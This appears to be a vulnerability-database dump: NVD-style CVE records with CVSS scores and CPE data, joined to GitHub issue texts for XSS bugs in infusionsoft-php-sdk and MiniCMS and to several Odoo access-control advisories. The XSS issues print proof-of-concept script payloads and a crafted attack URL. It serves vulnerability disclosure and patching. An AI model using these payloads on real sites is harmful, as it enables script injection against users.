{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:novaksolutions:infusionsoft-php-sdk:2016-10-31:*:*:*:*:*:*:*", "matchCriteriaId": "5B44A3F9-1A76-4042-80D5-1A4434380617", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111
[ "Exploit", "Third Party Advisory" ]
github.com
[ "novaksolutions", "infusionsoft-php-sdk" ]
Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user-supplied data in 'ContactId' HTTP _REQUEST parameter that will be passed to “infusionsoft-php-sdk-master/Infusionsoft/examples/leadscoring.php”. The infected source code is line 2, there is no protection on $_REQUEST['ContactId']; If $_REQUEST['ContactId'] contains evil js code, line 53 will trigger untrusted code to be excuted on the browser side ![code1](https://cloud.githubusercontent.com/assets/1484292/23243893/d69c42ec-f9bc-11e6-868f-316226e6bd8f.png) So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. http://your-web-root/infusionsoft-php-sdk-master/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><" The follow screenshot is the result to click the upper url ( win7 sp1 x64 + firefox 51.0.1 32bit ): ![sc](https://cloud.githubusercontent.com/assets/1484292/23243910/e5685400-f9bc-11e6-9129-27c184a59bff.png) Discoverer: ADLab of Venustech
A Reflected XSS vulnerability in this sdk
https://api.github.com/repos/novaksolutions/infusionsoft-php-sdk/issues/111/comments
1
2017-02-23T03:41:11Z
2017-04-25T15:06:02Z
https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111
209,655,418
111
472
CVE-2019-13186
2019-07-03T17:15:10.407
In MiniCMS V1.10, stored XSS was found in mc-admin/post-edit.php via the tags box. An attacker can use it to get a user's cookie. This is different from CVE-2018-10296, CVE-2018-16233, and CVE-2018-20520.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "1EAC73A0-FD32-4344-A4F5-BB6D3D1B7DA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bg5sbk/MiniCMS/issues/31
[ "Exploit", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
A stored XSS was found in mc-admin/post-edit.php.This vulnerability is similar to CVE-2018-10296 but at a different place. POC: Firstly,enter the /MiniCMS/mc-admin/post-edit.php page and write the payload” <script>alert(document.domain)</script>” into the tags box: ![1](https://user-images.githubusercontent.com/25722416/60565170-23ee0480-9d95-11e9-8338-67144143335d.png) Save it,then return to the main page to go to the archive page: ![2](https://user-images.githubusercontent.com/25722416/60565177-294b4f00-9d95-11e9-9971-943ec96ed3cd.png) Then you get the window popped with the domain: ![3](https://user-images.githubusercontent.com/25722416/60565180-2bada900-9d95-11e9-89ac-7cb800b510c7.png)
A stored XSS was found in mc-admin/post-edit.php.
https://api.github.com/repos/bg5sbk/MiniCMS/issues/31/comments
0
2019-07-03T05:22:37Z
2021-07-19T17:35:35Z
https://github.com/bg5sbk/MiniCMS/issues/31
463,549,862
31
473
CVE-2018-14866
2019-07-03T18:15:10.317
Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32509" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32509" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/odoo/odoo/issues/32509
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-9 Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Core **Credits**: Florent de Labarre **CVE ID**: [CVE-2018-14866](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14866) ## I. Background The Odoo framework includes a mechanism for managing temporary records, known as TransientModels, for the purpose of containing transient data while a certain screen or operation is in progress. Such records are regularly deleted by a garbage collector job. The security model for regulating access to TransientModels is different from regular non-transient ones, in that there are not customizable access rights. A default, hardcoded security policy makes those transient records accessible only to the user who created them (the owner), and to the administrator. ## II. Problem Description The implementation of the security model for TransientModels was incomplete, to the effect that some operations were possible by users on transient records that they did not own. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: Unprivileged user account required **CVSS3 Score**: Low :: 3.5 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N) An attacker with an unprivileged user account (even portal users) may be able to retrieve values of fields from transient records that they did not own, via specially crafted RPC requests, in the interval between their creation and the automatic garbage collection. Such transient records may include limited business or sensitive data that should not have been accessible to the attacker. Exploitation would however be difficult in practice, limited by the need to actually have TransientModels that include sensitive data (which depends on installed modules), by the need to have a privileged user populate transient records with the data, and by the need to execute the attack in the limited time window before the automatic garbage collection. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround No workaround is known, so applying the patch or updating is strongly recommended. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 67bf250ea5035e2e8e4da7e32f2671beb75cfab4 - 10.0: e93fa785629500e997330731d84853eb2edac299 - 11.0: 4b1b70a77a482926aa87503a8ef9d0aec5c5293f - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-9 (CVE-2018-14866) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32509/comments
0
2019-04-08T13:37:46Z
2019-04-08T13:37:49Z
https://github.com/odoo/odoo/issues/32509
430,456,694
32,509
474
CVE-2018-14861
2019-07-03T19:15:10.503
Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32506" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32506" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/odoo/odoo/issues/32506
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-6 Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users. **Affects**: Odoo 10.0, 11.0 (Community and Enterprise Editions) **Component**: Odoo Framework **Credits**: Nils Hamerlinck (Trobz), Swapnesh Shah **CVE ID**: [CVE-2018-14861](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14861) ## I. Background As of Odoo 8.0, when local passwords are used, the passwords are stored by default as salted cryptographic hashes (derived via PBKDF2 using SHA-512 hashing). In order to protect the cryptographic hashes from being accessed by users, a special security rule prevents reading the fields where the password hashes are stored. ## II. Problem Description A programming error made this special security rule ineffective when the CSV/Excel export mechanism is used. This is a regression of the correction for Security Advisory 2016-04a-password-export. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: "Employee" access required **CVSS3 Score**: Medium :: 4.3 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) By using the CSV export functionality, users with internal "Employee" access might export the password hashes of other database users, including those of privileged users. Exploiting these password hashes to retrieve user passwords is difficult but not necessarily impossible, for example in the presence of weak passwords or passwords that may be subject to dictionary attacks. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround No workaround is available, but users that are exclusively authenticated via remote authentication methods such as LDAP (auth_ldap) are not vulnerable, as they have no local password. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 10.0: 0dbed816b90db5be06c60bf0e4a74411c9cf962e - 11.0: 698314e5d4c145c0b7b9fc323fccc7c3a19de0fc - 11.0-ent and 10.0-ent (Enterprise): see 11.0 and 10.0. Version 9.0 is not impacted by this vulnerability.
[SEC] ODOO-SA-2018-08-07-6 (CVE-2018-14861) - Improper data access control in...
https://api.github.com/repos/odoo/odoo/issues/32506/comments
0
2019-04-08T13:37:39Z
2019-04-08T13:37:41Z
https://github.com/odoo/odoo/issues/32506
430,456,630
32,506
475
CVE-2018-14862
2019-07-03T19:15:10.580
Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32504" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32504" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/odoo/odoo/issues/32504
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-4 Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: mail **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14862](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14862) ## I. Background Odoo's chatter engine allows users to create templates for commonly used messages. To make it faster to use, the system allows template authors to create a shortcut action to reuse the template. ## II. Problem Description The shortcut removal mechanism can be abused to remove other part of the interface. ## III. Impact **Attack Vector**: Network exploitable **Authentication**: User account required **CVSS3 Score**: High :: 7.1 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H) A malicious employee could craft malicious RPC requests to cause the deletion of arbitrary menu entries of the user interface. While there is no loss of business data, removing the shortcut would make the system very difficult to use, until repaired. Odoo S.A. is not aware of any use of this vulnerability in the wild. ## IV. Workaround Restricting the create and write access to the mail.template model to trusted users only is a way to mitigate the attack until the patch can be applied. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: https://www.odoo.com/documentation/11.0/setup/update.html If you choose to apply the patch instead, change into the main directory of your Odoo installation (the one containing "odoo" and "addons" directories), then execute the patch command, typically: patch -p0 -f < /path/to/the_patch_file.patch This command assumes your installation layout corresponds to the latest source code layout of the Odoo project on GitHub. If your installation differs, please extract the various patch hunks from the files and apply them in the appropriate locations. ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 9.0: 91486656ab584cbb7a1f48543ccfe37fb386d850 - 10.0: 2d32609440239bd284fd472851a5c7936aa516ed - 11.0: 1e42cbc1f425d31bbc83f3994f3bd8836aa201a2 - 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
[SEC] ODOO-SA-2018-08-07-4 (CVE-2018-14862) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32504/comments
0
2019-04-08T13:37:34Z
2019-04-08T13:37:36Z
https://github.com/odoo/odoo/issues/32504
430,456,583
32,504
476
CVE-2018-14863
2019-07-03T19:15:10.643
Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32508" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32508" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "284" ]
284
https://github.com/odoo/odoo/issues/32508
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-8 Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Odoo Framework **Credits**: Nils Hamerlinck (Trobz) **CVE ID**: [CVE-2018-14863](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14863) ## I. Background As of Odoo 8.0, the Odoo framework was considerably changed by the introduction of a new abstraction layer to communicate with the database, dubbed the "new API". To simplify the transition, the new API was initially written with a backwards-compatibility layer so that it could support modules written for older versions with limited changes. ## II. Problem Description A programming error in the backwards-compatibility layer allows bypassing the access control and remotely accessing private functions. ## III. Impact Access Vector: Network exploitable Access Complexity: Low **Authentication**: User account required **CVSS3 Score**: High :: 8.1 **CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) By crafting a specific RPC request, malicious users (including portal users) may call private methods, not normally exposed via the RPC API. An attacker may be able to use them outside of the intended scope to retrieve or alter information stored in the database. Odoo S.A. is not aware of any malicious use of this vulnerability. ## IV. Workaround No workaround is known, applying the patch is strongly recommended. Odoo Online servers have been patched as soon as the correction was available. ## V. Solution Apply the patches corresponding to your Odoo installation, or update to the latest revision, either via GitHub or by downloading it: https://www.odoo.com/page/download For the actual update procedure, please refer to our update instructions, valid for all versions: 